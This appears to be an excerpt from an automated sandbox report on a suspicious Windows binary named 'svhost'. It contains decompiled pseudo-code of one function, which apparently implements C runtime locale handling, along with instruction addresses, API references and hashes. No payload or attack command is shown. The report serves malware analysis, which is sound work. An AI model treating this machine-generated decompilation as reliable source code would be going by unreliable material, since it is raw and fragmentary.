													_v454 = _t433;
													_t432 = _v452;
													if(_t433 !=  *((intOrPtr*)(_t385 + 2))) {
														break;
													} else {
														_t263 = _t263 + 4;
														_t385 = _t385 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L68;
														}
													}
												}
												L70:
												__eflags = _t264;
												if(_t264 == 0) {
													_t370 = _t370 + 1;
													__eflags = _t370;
													goto L75;
												} else {
													_t265 =  &_v276;
													_push(_t265);
													_push(_t454);
													_push(_t436);
													L84();
													_t432 = _v452;
													_t476 = _t476 + 0xc;
													__eflags = _t265;
													if(_t265 == 0) {
														_t262 = 0;
														_v460 = 0;
													} else {
														_t370 = _t370 + 1;
														goto L75;
													}
												}
												goto L76;
											}
											asm("sbb eax, eax");
											_t264 = _t263 | 0x00000001;
											__eflags = 0;
											goto L70;
										}
										L76:
										_t454 = _t454 + 1;
										_t432 = _t432 + 0x10;
										_v452 = _t432;
										__eflags = _t454 - 5;
									} while (_t454 <= 5);
									__eflags = _t262;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t370;
										if(__eflags != 0) {
											goto L80;
										} else {
										}
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t452 + 2) - 0x43;
								if( *(_t452 + 2) != 0x43) {
									goto L60;
								} else {
									__eflags =  *((short*)(_t452 + 4)) - 0x5f;
									if( *((short*)(_t452 + 4)) != 0x5f) {
										goto L60;
									} else {
										while(1) {
											_t267 = E00EB84C6(_t452, 0xecb074);
											_t372 = _t267;
											_v468 = _t372;
											_pop(_t387);
											__eflags = _t372;
											if(_t372 == 0) {
												break;
											}
											_t269 = _t267 - _t452;
											__eflags = _t269;
											_v460 = _t269 >> 1;
											if(_t269 == 0) {
												break;
											} else {
												_t271 = 0x3b;
												__eflags =  *_t372 - _t271;
												if( *_t372 == _t271) {
													break;
												} else {
													_t439 = _v460;
													_t373 = 0xecafbc;
													_v456 = 1;
													do {
														_t272 = E00EB0488( *_t373, _t452, _t439);
														_t475 = _t475 + 0xc;
														__eflags = _t272;
														if(_t272 != 0) {
															goto L46;
														} else {
															_t388 =  *_t373;
															_t431 = _t388 + 2;
															do {
																_t343 =  *_t388;
																_t388 = _t388 + 2;
																__eflags = _t343 - _v472;
															} while (_t343 != _v472);
															_t387 = _t388 - _t431 >> 1;
															__eflags = _t439 - _t388 - _t431 >> 1;
															if(_t439 != _t388 - _t431 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v456 = _v456 + 1;
														_t373 = _t373 + 0xc;
														__eflags = _t373 - 0xecafec;
													} while (_t373 <= 0xecafec);
													_t370 = _v468 + 2;
													_t273 = E00EB846D(_t387, _t370, 0xecb07c);
													_t436 = _v464;
													_t455 = _t273;
													_pop(_t391);
													__eflags = _t455;
													if(_t455 != 0) {
														L49:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t392 = _v452;
															goto L55;
														} else {
															_push(_t455);
															_t276 = E00EAFAFC( &_v276, 0x83, _t370);
															_t477 = _t475 + 0x10;
															__eflags = _t276;
															if(_t276 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E00EA4980();
																asm("int3");
																_push(_t469);
																_t470 = _t477;
																_t279 =  *0xeef074; // 0x221cac15
																_v560 = _t279 ^ _t470;
																_push(_t370);
																_t375 = _v544;
																_push(_t455);
																_push(_t436);
																_t440 = _v548;
																_v1288 = _t375;
																_v1276 = E00EB0EFC(_t391, _t431) + 0x278;
																_t286 = E00EAE4F6(_t375, _t431, _t440, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1264);
																_t479 = _t477 - 0x2e4 + 0x18;
																__eflags = _t286;
																if(_t286 == 0) {
																	L124:
																	__eflags = 0;
																	goto L125;
																} else {
																	_t103 = _t375 + 2; // 0x6
																	_t459 = _t103 << 4;
																	__eflags = _t459;
																	_t289 =  &_v280;
																	_v724 = _t459;
																	_t431 =  *(_t459 + _t440);
																	_t395 =  *(_t459 + _t440);
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t289 -  *_t395;
																		_t461 = _v724;
																		if( *_t289 !=  *_t395) {
																			break;
																		}
																		__eflags =  *_t289;
																		if( *_t289 == 0) {
																			L91:
																			_t290 = _v712;
																		} else {
																			_t467 =  *((intOrPtr*)(_t289 + 2));
																			__eflags = _t467 -  *((intOrPtr*)(_t395 + 2));
																			_v714 = _t467;
																			_t461 = _v724;
																			if(_t467 !=  *((intOrPtr*)(_t395 + 2))) {
																				break;
																			} else {
																				_t289 = _t289 + 4;
																				_t395 = _t395 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t290;
																		if(_t290 != 0) {
																			_t396 =  &_v280;
																			_t431 = _t396 + 2;
																			do {
																				_t291 =  *_t396;
																				_t396 = _t396 + 2;
																				__eflags = _t291 - _v712;
																			} while (_t291 != _v712);
																			_v728 = (_t396 - _t431 >> 1) + 1;
																			_t294 = E00EB0559(4 + ((_t396 - _t431 >> 1) + 1) * 2);
																			_v740 = _t294;
																			__eflags = _t294;
																			if(_t294 == 0) {
																				goto L124;
																			} else {
																				_v736 =  *((intOrPtr*)(_t461 + _t440));
																				_v748 =  *(_t440 + 0xa0 + _t375 * 4);
																				_v752 =  *(_t440 + 8);
																				_t403 =  &_v280;
																				_v716 = _t294 + 4;
																				_t296 = E00EA58BC(_t294 + 4, _v728, _t403);
																				_t480 = _t479 + 0xc;
																				__eflags = _t296;
																				if(_t296 != 0) {
																					_t297 = _v712;
																					_push(_t297);
																					_push(_t297);
																					_push(_t297);
																					_push(_t297);
																					_push(_t297);
																					E00EA4980();
																					asm("int3");
																					_push(_t470);
																					_push(_t403);
																					_v1336 = _v1336 & 0x00000000;
																					_t300 = E00EB16D5(_v1324, 0x20001004,  &_v1336, 2);
																					__eflags = _t300;
																					if(_t300 == 0) {
																						L134:
																						return 0xfde9;
																					}
																					_t302 = _v20;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						goto L134;
																					}
																					return _t302;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t461 + _t440)) = _v716;
																					if(_v280 != 0x43) {
																						L102:
																						_t305 = E00EAE213(_t375, _t440,  &_v708);
																						_t405 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t405 = _v712;
																							_t305 = _t405;
																						}
																					}
																					 *(_t440 + 0xa0 + _t375 * 4) = _t305;
																					__eflags = _t375 - 2;
																					if(_t375 != 2) {
																						__eflags = _t375 - 1;
																						if(_t375 != 1) {
																							__eflags = _t375 - 5;
																							if(_t375 == 5) {
																								 *((intOrPtr*)(_t440 + 0x14)) = _v720;
																							}
																						} else {
																							 *((intOrPtr*)(_t440 + 0x10)) = _v720;
																						}
																					} else {
																						_t465 = _v732;
																						_t431 = _t405;
																						_t415 = _t465;
																						 *(_t440 + 8) = _v720;
																						_v716 = _t465;
																						_v728 = _t465[8];
																						_v720 = _t465[9];
																						while(1) {
																							__eflags =  *(_t440 + 8) -  *_t415;
																							if( *(_t440 + 8) ==  *_t415) {
																								break;
																							}
																							_t466 = _v716;
																							_t431 = _t431 + 1;
																							_t337 =  *_t415;
																							 *_t466 = _v728;
																							_v720 = _t415[1];
																							_t415 = _t466 + 8;
																							 *((intOrPtr*)(_t466 + 4)) = _v720;
																							_t375 = _v744;
																							_t465 = _v732;
																							_v728 = _t337;
																							_v716 = _t415;
																							__eflags = _t431 - 5;
																							if(_t431 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t431 - 5;
																							if(__eflags == 0) {
																								_t328 = E00EB5E4E(_t431, __eflags, _v712, 1, 0xecaf30, 0x7f,  &_v536,  *(_t440 + 8), 1);
																								_t480 = _t480 + 0x1c;
																								__eflags = _t328;
																								if(_t328 == 0) {
																									_t416 = _v712;
																								} else {
																									_t330 = _v712;
																									do {
																										 *(_t470 + _t330 * 2 - 0x20c) =  *(_t470 + _t330 * 2 - 0x20c) & 0x000001ff;
																										_t330 = _t330 + 1;
																										__eflags = _t330 - 0x7f;
																									} while (_t330 < 0x7f);
																									_t332 = E00EA19FD( &_v536,  *0xeef2b8, 0xfe);
																									_t480 = _t480 + 0xc;
																									__eflags = _t332;
																									_t416 = 0 | _t332 == 0x00000000;
																								}
																								_t465[1] = _t416;
																								 *_t465 =  *(_t440 + 8);
																							}
																							 *(_t440 + 0x18) = _t465[1];
																							goto L122;
																						}
																						__eflags = _t431;
																						if(_t431 != 0) {
																							 *_t465 =  *(_t465 + _t431 * 8);
																							_t465[1] =  *(_t465 + 4 + _t431 * 8);
																							 *(_t465 + _t431 * 8) = _v728;
																							 *(_t465 + 4 + _t431 * 8) = _v720;
																						}
																						goto L110;
																					}
																					L122:
																					_t306 = _t375 * 0xc;
																					_t199 = _t306 + 0xecafb8; // 0xe8a7d8
																					 *0xec4320(_t440);
																					_t308 =  *((intOrPtr*)( *_t199))();
																					_t408 = _v736;
																					__eflags = _t308;
																					if(_t308 == 0) {
																						__eflags = _t408 - 0xeef388;
																						if(_t408 != 0xeef388) {
																							_t464 = _t375 + _t375;
																							__eflags = _t464;
																							asm("lock xadd [eax], ecx");
																							if(_t464 != 0) {
																								goto L129;
																							} else {
																								E00EB051F( *((intOrPtr*)(_t440 + 0x28 + _t464 * 8)));
																								E00EB051F( *((intOrPtr*)(_t440 + 0x24 + _t464 * 8)));
																								E00EB051F( *(_t440 + 0xa0 + _t375 * 4));
																								_t411 = _v712;
																								 *(_v724 + _t440) = _t411;
																								 *(_t440 + 0xa0 + _t375 * 4) = _t411;
																							}
																						}
																						_t409 = _v740;
																						 *_t409 = 1;
																						 *((intOrPtr*)(_t440 + 0x28 + (_t375 + _t375) * 8)) = _t409;
																					} else {
																						 *((intOrPtr*)(_v724 + _t440)) = _t408;
																						E00EB051F( *(_t440 + 0xa0 + _t375 * 4));
																						 *(_t440 + 0xa0 + _t375 * 4) = _v748;
																						E00EB051F(_v740);
																						 *(_t440 + 8) = _v752;
																						goto L124;
																					}
																					goto L125;
																				}
																			}
																		} else {
																			L125:
																			_pop(_t441);
																			_pop(_t457);
																			__eflags = _v16 ^ _t470;
																			_pop(_t376);
																			return E00E89A35(_t376, _v16 ^ _t470, _t431, _t441, _t457);
																		}
																		goto L136;
																	}
																	asm("sbb eax, eax");
																	_t290 = _t289 | 0x00000001;
																	__eflags = _t290;
																	goto L93;
																}
															} else {
																_t339 = _t455 + _t455;
																__eflags = _t339 - 0x106;
																if(_t339 >= 0x106) {
																	E00E89FFE();
																	goto L83;
																} else {
																	 *((short*)(_t469 + _t339 - 0x10c)) = 0;
																	_t341 =  &_v276;
																	_push(_t341);
																	_push(_v456);
																	_push(_t436);
																	L84();
																	_t392 = _v452;
																	_t475 = _t477 + 0xc;
																	__eflags = _t341;
																	if(_t341 != 0) {
																		_t392 = _t392 + 1;
																		_v452 = _t392;
																	}
																	L55:
																	_t452 = _t370 + _t455 * 2;
																	_t274 =  *_t452 & 0x0000ffff;
																	_t431 = _t274;
																	__eflags = _t274;
																	if(_t274 != 0) {
																		_t452 = _t452 + 2;
																		__eflags = _t452;
																		_t431 =  *_t452 & 0x0000ffff;
																	}
																	__eflags = _t431;
																	if(_t431 != 0) {
																		continue;
																	} else {
																		__eflags = _t392;
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																			break;
																		}
																		goto L81;
																	}
																}
															}
														}
													} else {
														_t342 = 0x3b;
														__eflags =  *_t370 - _t342;
														if( *_t370 != _t342) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L136;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t452;
						if(_t452 != 0) {
							_push(_t452);
							_push(_t254);
							_push(_t436);
							L84();
						}
						L81:
						_pop(_t437);
						_pop(_t453);
						__eflags = _v12 ^ _t469;
						_pop(_t371);
						return E00E89A35(_t371, _v12 ^ _t469, _t431, _t437, _t453);
					}
				}
				L136:
			}


















































































































































                                      0x00eae980
                                      0x00eae988
                                      0x00eae989
                                      0x00eae992
                                      0x00eae995
                                      0x00eae99a
                                      0x00eae99c
                                      0x00eae99e
                                      0x00eae9a1
                                      0x00eaeabe
                                      0x00eaeac1
                                      0x00eae9a7
                                      0x00eae9a7
                                      0x00eae9a8
                                      0x00eae9a8
                                      0x00eae9ab
                                      0x00eae9ae
                                      0x00eae9b0
                                      0x00eae9b3
                                      0x00eae9b6
                                      0x00eae9b8
                                      0x00eae9bb
                                      0x00eae9c0
                                      0x00eae9ce
                                      0x00eae9d8
                                      0x00eae9db
                                      0x00eae9de
                                      0x00eae9de
                                      0x00eae9e9
                                      0x00eae9ee
                                      0x00eae9f3
                                      0x00000000
                                      0x00eae9f9
                                      0x00eae9fc
                                      0x00eae9fc
                                      0x00eae9ff
                                      0x00eaea01
                                      0x00eaea04
                                      0x00eaea06
                                      0x00eaea06
                                      0x00eaea06
                                      0x00eaea09
                                      0x00eaea09
                                      0x00eaea09
                                      0x00eaea0f
                                      0x00000000
                                      0x00000000
                                      0x00eaea14
                                      0x00eaea2b
                                      0x00eaea2b
                                      0x00eaea16
                                      0x00eaea16
                                      0x00eaea1e
                                      0x00000000
                                      0x00eaea20
                                      0x00eaea20
                                      0x00eaea23
                                      0x00eaea29
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eaea29
                                      0x00eaea1e
                                      0x00eaea34
                                      0x00eaea34
                                      0x00eaea39
                                      0x00eaea3e
                                      0x00eaea42
                                      0x00eaea4e
                                      0x00eaea51
                                      0x00eaea54
                                      0x00eaea5e
                                      0x00eaea66
                                      0x00eaea6e
                                      0x00000000
                                      0x00eaea74
                                      0x00eaea78
                                      0x00eaeac3
                                      0x00eaeacc
                                      0x00eaeacf
                                      0x00eaead1
                                      0x00eaead5
                                      0x00eaead9
                                      0x00eaeade
                                      0x00eaeae3
                                      0x00eaead9
                                      0x00eaeae7
                                      0x00eaeae9
                                      0x00eaeaeb
                                      0x00eaeaef
                                      0x00eaeaf0
                                      0x00eaeaf5
                                      0x00eaeafa
                                      0x00eaeaf0
                                      0x00eaeafd
                                      0x00eaeb00
                                      0x00eaeb03
                                      0x00eaeb06
                                      0x00eaeb09
                                      0x00eaea7a
                                      0x00eaea7d
                                      0x00eaea80
                                      0x00eaea82
                                      0x00eaea86
                                      0x00eaea8a
                                      0x00eaea8f
                                      0x00eaea94
                                      0x00eaea8a
                                      0x00eaea9a
                                      0x00eaea9c
                                      0x00eaeaa1
                                      0x00eaeaa6
                                      0x00eaeaab
                                      0x00eaeaa1
                                      0x00eaeaac
                                      0x00eaeab0
                                      0x00eaeab0
                                      0x00eaeab3
                                      0x00eaeab7
                                      0x00eaeaba
                                      0x00eaeaba
                                      0x00000000
                                      0x00eaeabd
                                      0x00000000
                                      0x00eaea6e
                                      0x00eaea2f
                                      0x00eaea31
                                      0x00eaea31
                                      0x00000000
                                      0x00eaea31
                                      0x00eaeb10
                                      0x00eaeb11
                                      0x00eaeb12
                                      0x00eaeb13
                                      0x00eaeb14
                                      0x00eaeb15
                                      0x00eaeb1a
                                      0x00eaeb1e
                                      0x00eaeb20
                                      0x00eaeb26
                                      0x00eaeb2d
                                      0x00eaeb30
                                      0x00eaeb33
                                      0x00eaeb34
                                      0x00eaeb35
                                      0x00eaeb38
                                      0x00eaeb39
                                      0x00eaeb3c
                                      0x00eaeb42
                                      0x00eaeb44
                                      0x00eaeb69
                                      0x00eaeb73
                                      0x00eaeb79
                                      0x00eaeb7b
                                      0x00eaeb81
                                      0x00eaeb83
                                      0x00eaede3
                                      0x00eaede4
                                      0x00000000
                                      0x00eaeb89
                                      0x00eaeb89
                                      0x00eaeb8d
                                      0x00eaecfb
                                      0x00eaed18
                                      0x00eaed1d
                                      0x00eaed20
                                      0x00eaed22
                                      0x00eaed28
                                      0x00eaed2a
                                      0x00eaed2d
                                      0x00eaed2f
                                      0x00eaed35
                                      0x00eaed35
                                      0x00eaed37
                                      0x00eaedbe
                                      0x00eaedbe
                                      0x00eaed3d
                                      0x00eaed3d
                                      0x00eaed3f
                                      0x00eaed45
                                      0x00eaed48
                                      0x00eaed4b
                                      0x00eaed51
                                      0x00000000
                                      0x00000000
                                      0x00eaed53
                                      0x00eaed57
                                      0x00eaed80
                                      0x00eaed82
                                      0x00eaed59
                                      0x00eaed59
                                      0x00eaed5d
                                      0x00eaed61
                                      0x00eaed68
                                      0x00eaed6e
                                      0x00000000
                                      0x00eaed70
                                      0x00eaed70
                                      0x00eaed73
                                      0x00eaed76
                                      0x00eaed7e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eaed7e
                                      0x00eaed6e
                                      0x00eaed8d
                                      0x00eaed8d
                                      0x00eaed8f
                                      0x00eaedbd
                                      0x00eaedbd
                                      0x00000000
                                      0x00eaed91
                                      0x00eaed91
                                      0x00eaed97
                                      0x00eaed98
                                      0x00eaed99
                                      0x00eaed9a
                                      0x00eaed9f
                                      0x00eaeda5
                                      0x00eaeda8
                                      0x00eaedaa
                                      0x00eaedb3
                                      0x00eaedb5
                                      0x00eaedac
                                      0x00eaedac
                                      0x00000000
                                      0x00eaedad
                                      0x00eaedaa
                                      0x00000000
                                      0x00eaed8f
                                      0x00eaed86
                                      0x00eaed88
                                      0x00eaed8b
                                      0x00000000
                                      0x00eaed8b
                                      0x00eaedc4
                                      0x00eaedc4
                                      0x00eaedc5
                                      0x00eaedc8
                                      0x00eaedce
                                      0x00eaedce
                                      0x00eaedd7
                                      0x00eaedd9
                                      0x00000000
                                      0x00eaeddb
                                      0x00eaeddb
                                      0x00eaeddd
                                      0x00000000
                                      0x00eaeddf
                                      0x00eaeddf
                                      0x00eaeddd
                                      0x00eaedd9
                                      0x00000000
                                      0x00eaeb93
                                      0x00eaeb93
                                      0x00eaeb98
                                      0x00000000
                                      0x00eaeb9e
                                      0x00eaeb9e
                                      0x00eaeba3
                                      0x00000000
                                      0x00eaeba9
                                      0x00eaeba9
                                      0x00eaebaf
                                      0x00eaebb4
                                      0x00eaebb6
                                      0x00eaebbd
                                      0x00eaebbe
                                      0x00eaebc0
                                      0x00000000
                                      0x00000000
                                      0x00eaebc6
                                      0x00eaebc6
                                      0x00eaebca
                                      0x00eaebd0
                                      0x00000000
                                      0x00eaebd6
                                      0x00eaebd8
                                      0x00eaebd9
                                      0x00eaebdc
                                      0x00000000
                                      0x00eaebe2
                                      0x00eaebe2
                                      0x00eaebe8
                                      0x00eaebed
                                      0x00eaebf7
                                      0x00eaebfb
                                      0x00eaec00
                                      0x00eaec03
                                      0x00eaec05
                                      0x00000000
                                      0x00eaec07
                                      0x00eaec07
                                      0x00eaec09
                                      0x00eaec0c
                                      0x00eaec0c
                                      0x00eaec0f
                                      0x00eaec12
                                      0x00eaec12
                                      0x00eaec1d
                                      0x00eaec1f
                                      0x00eaec21
                                      0x00000000
                                      0x00000000
                                      0x00eaec21
                                      0x00000000
                                      0x00eaec23
                                      0x00eaec23
                                      0x00eaec29
                                      0x00eaec2c
                                      0x00eaec2c
                                      0x00eaec3a
                                      0x00eaec43
                                      0x00eaec48
                                      0x00eaec4e
                                      0x00eaec51
                                      0x00eaec52
                                      0x00eaec54
                                      0x00eaec62
                                      0x00eaec62
                                      0x00eaec69
                                      0x00eaecca
                                      0x00000000
                                      0x00eaec6b
                                      0x00eaec6b
                                      0x00eaec79
                                      0x00eaec7e
                                      0x00eaec81
                                      0x00eaec83
                                      0x00eaedfe
                                      0x00eaee00
                                      0x00eaee01
                                      0x00eaee02
                                      0x00eaee03
                                      0x00eaee04
                                      0x00eaee05
                                      0x00eaee0a
                                      0x00eaee0d
                                      0x00eaee0e
                                      0x00eaee16
                                      0x00eaee1d
                                      0x00eaee20
                                      0x00eaee21
                                      0x00eaee24
                                      0x00eaee28
                                      0x00eaee29
                                      0x00eaee2c
                                      0x00eaee3c
                                      0x00eaee5f
                                      0x00eaee64
                                      0x00eaee67
                                      0x00eaee69
                                      0x00eaf141
                                      0x00eaf141
                                      0x00000000
                                      0x00eaee6f
                                      0x00eaee6f
                                      0x00eaee72
                                      0x00eaee72
                                      0x00eaee75
                                      0x00eaee7b
                                      0x00eaee81
                                      0x00eaee84
                                      0x00eaee86
                                      0x00eaee89
                                      0x00eaee90
                                      0x00eaee93
                                      0x00eaee99
                                      0x00000000
                                      0x00000000
                                      0x00eaee9b
                                      0x00eaee9f
                                      0x00eaeec8
                                      0x00eaeec8
                                      0x00eaeea1
                                      0x00eaeea1
                                      0x00eaeea5
                                      0x00eaeea9
                                      0x00eaeeb0
                                      0x00eaeeb6
                                      0x00000000
                                      0x00eaeeb8
                                      0x00eaeeb8
                                      0x00eaeebb
                                      0x00eaeebe
                                      0x00eaeec6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eaeec6
                                      0x00eaeeb6
                                      0x00eaeed5
                                      0x00eaeed5
                                      0x00eaeed7
                                      0x00eaeee0
                                      0x00eaeee6
                                      0x00eaeee9
                                      0x00eaeee9
                                      0x00eaeeec
                                      0x00eaeeef
                                      0x00eaeeef
                                      0x00eaeeff
                                      0x00eaef0d
                                      0x00eaef12
                                      0x00eaef19
                                      0x00eaef1b
                                      0x00000000
                                      0x00eaef21
                                      0x00eaef27
                                      0x00eaef34
                                      0x00eaef3d
                                      0x00eaef43
                                      0x00eaef50
                                      0x00eaef57
                                      0x00eaef5c
                                      0x00eaef5f
                                      0x00eaef61
                                      0x00eaf1c1
                                      0x00eaf1c7
                                      0x00eaf1c8
                                      0x00eaf1c9
                                      0x00eaf1ca
                                      0x00eaf1cb
                                      0x00eaf1cc
                                      0x00eaf1d1
                                      0x00eaf1d4
                                      0x00eaf1d7
                                      0x00eaf1d8
                                      0x00eaf1ea
                                      0x00eaf1ef
                                      0x00eaf1f1
                                      0x00eaf1fa
                                      0x00000000
                                      0x00eaf1fa
                                      0x00eaf1f3
                                      0x00eaf1f6
                                      0x00eaf1f8
                                      0x00000000
                                      0x00000000
                                      0x00eaf200
                                      0x00eaef67
                                      0x00eaef67
                                      0x00eaef75
                                      0x00eaef78
                                      0x00eaef8e
                                      0x00eaef95
                                      0x00eaef9b
                                      0x00eaef7a
                                      0x00eaef7a
                                      0x00eaef82
                                      0x00000000
                                      0x00eaef84
                                      0x00eaef84
                                      0x00eaef8a
                                      0x00eaef8a
                                      0x00eaef82
                                      0x00eaefa1
                                      0x00eaefa8
                                      0x00eaefab
                                      0x00eaf0cb
                                      0x00eaf0ce
                                      0x00eaf0db
                                      0x00eaf0de
                                      0x00eaf0e6
                                      0x00eaf0e6
                                      0x00eaf0d0
                                      0x00eaf0d6
                                      0x00eaf0d6
                                      0x00eaefb1
                                      0x00eaefb1
                                      0x00eaefb7
                                      0x00eaefbf
                                      0x00eaefc1
                                      0x00eaefc4
                                      0x00eaefcd
                                      0x00eaefd6
                                      0x00eaefdc
                                      0x00eaefdf
                                      0x00eaefe1
                                      0x00000000
                                      0x00000000
                                      0x00eaefe3
                                      0x00eaefe9
                                      0x00eaefea
                                      0x00eaeff5
                                      0x00eaeffd
                                      0x00eaf005
                                      0x00eaf008
                                      0x00eaf00b
                                      0x00eaf011
                                      0x00eaf017
                                      0x00eaf01d
                                      0x00eaf023
                                      0x00eaf026
                                      0x00000000
                                      0x00000000
                                      0x00eaf028
                                      0x00eaf04d
                                      0x00eaf04d
                                      0x00eaf050
                                      0x00eaf06d
                                      0x00eaf072
                                      0x00eaf075
                                      0x00eaf077
                                      0x00eaf0b5
                                      0x00eaf079
                                      0x00eaf079
                                      0x00eaf07f
                                      0x00eaf084
                                      0x00eaf08c
                                      0x00eaf08d
                                      0x00eaf08d
                                      0x00eaf0a4
                                      0x00eaf0ab
                                      0x00eaf0ae
                                      0x00eaf0b0
                                      0x00eaf0b0
                                      0x00eaf0bb
                                      0x00eaf0c1
                                      0x00eaf0c1
                                      0x00eaf0c6
                                      0x00000000
                                      0x00eaf0c6
                                      0x00eaf02a
                                      0x00eaf02c
                                      0x00eaf031
                                      0x00eaf037
                                      0x00eaf040
                                      0x00eaf049
                                      0x00eaf049
                                      0x00000000
                                      0x00eaf02c
                                      0x00eaf0e9
                                      0x00eaf0e9
                                      0x00eaf0ed
                                      0x00eaf0f5
                                      0x00eaf0fb
                                      0x00eaf0fe
                                      0x00eaf104
                                      0x00eaf106
                                      0x00eaf152
                                      0x00eaf158
                                      0x00eaf15f
                                      0x00eaf15f
                                      0x00eaf165
                                      0x00eaf169
                                      0x00000000
                                      0x00eaf16b
                                      0x00eaf16f
                                      0x00eaf178
                                      0x00eaf184
                                      0x00eaf192
                                      0x00eaf198
                                      0x00eaf19b
                                      0x00eaf19b
                                      0x00eaf169
                                      0x00eaf1aa
                                      0x00eaf1b2
                                      0x00eaf1bb
                                      0x00eaf108
                                      0x00eaf10e
                                      0x00eaf118
                                      0x00eaf12a
                                      0x00eaf131
                                      0x00eaf13e
                                      0x00000000
                                      0x00eaf13e
                                      0x00000000
                                      0x00eaf106
                                      0x00eaef61
                                      0x00eaeed9
                                      0x00eaf143
                                      0x00eaf146
                                      0x00eaf147
                                      0x00eaf148
                                      0x00eaf14a
                                      0x00eaf151
                                      0x00eaf151
                                      0x00000000
                                      0x00eaeed7
                                      0x00eaeed0
                                      0x00eaeed2
                                      0x00eaeed2
                                      0x00000000
                                      0x00eaeed2
                                      0x00eaec89
                                      0x00eaec89
                                      0x00eaec8c
                                      0x00eaec91
                                      0x00eaedf9
                                      0x00000000
                                      0x00eaec97
                                      0x00eaec99
                                      0x00eaeca1
                                      0x00eaeca7
                                      0x00eaeca8
                                      0x00eaecae
                                      0x00eaecaf
                                      0x00eaecb4
                                      0x00eaecba
                                      0x00eaecbd
                                      0x00eaecbf
                                      0x00eaecc1
                                      0x00eaecc2
                                      0x00eaecc2
                                      0x00eaecd0
                                      0x00eaecd0
                                      0x00eaecd3
                                      0x00eaecd6
                                      0x00eaecd8
                                      0x00eaecdb
                                      0x00eaecdd
                                      0x00eaecdd
                                      0x00eaece0
                                      0x00eaece0
                                      0x00eaece3
                                      0x00eaece6
                                      0x00000000
                                      0x00eaecec
                                      0x00eaecec
                                      0x00eaecee
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eaecee
                                      0x00eaece6
                                      0x00eaec91
                                      0x00eaec83
                                      0x00eaec56
                                      0x00eaec58
                                      0x00eaec59
                                      0x00eaec5c
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eaec5c
                                      0x00eaec54
                                      0x00eaebdc
                                      0x00000000
                                      0x00eaebd0
                                      0x00000000
                                      0x00eaecf4
                                      0x00eaeba3
                                      0x00eaeb98
                                      0x00eaeb8d
                                      0x00eaeb46
                                      0x00eaeb46
                                      0x00eaeb48
                                      0x00eaeb4a
                                      0x00eaeb4b
                                      0x00eaeb4c
                                      0x00eaeb4d
                                      0x00eaeb52
                                      0x00eaedea
                                      0x00eaeded
                                      0x00eaedee
                                      0x00eaedef
                                      0x00eaedf1
                                      0x00eaedf8
                                      0x00eaedf8
                                      0x00eaeb44
                                      0x00000000

                                      APIs
                                        • Part of subcall function 00EB0559: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,00E89C45,00000000,?,00E5166C,00000000,?,00E5B6DC,00000000), ref: 00EB058B
                                      • _free.LIBCMT ref: 00EAEA8F
                                      • _free.LIBCMT ref: 00EAEAA6
                                      • _free.LIBCMT ref: 00EAEAC3
                                      • _free.LIBCMT ref: 00EAEADE
                                      • _free.LIBCMT ref: 00EAEAF5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$AllocateHeap
                                      • String ID:
                                      • API String ID: 3033488037-0
                                      • Opcode ID: fb1fa4d766c844c09b754aa9d33583a971bb52697b917a2f94c808ac7f79aff4
                                      • Instruction ID: a2afe158bbba447d234e5a29b3f029a275f3457458ecaaa3133ea344de68794d
                                      • Opcode Fuzzy Hash: fb1fa4d766c844c09b754aa9d33583a971bb52697b917a2f94c808ac7f79aff4
                                      • Instruction Fuzzy Hash: 8C519F72A00705AFDB21DF29D842AAA77F5FF49724B146569E409FB390E731FE018B50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EA4519 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
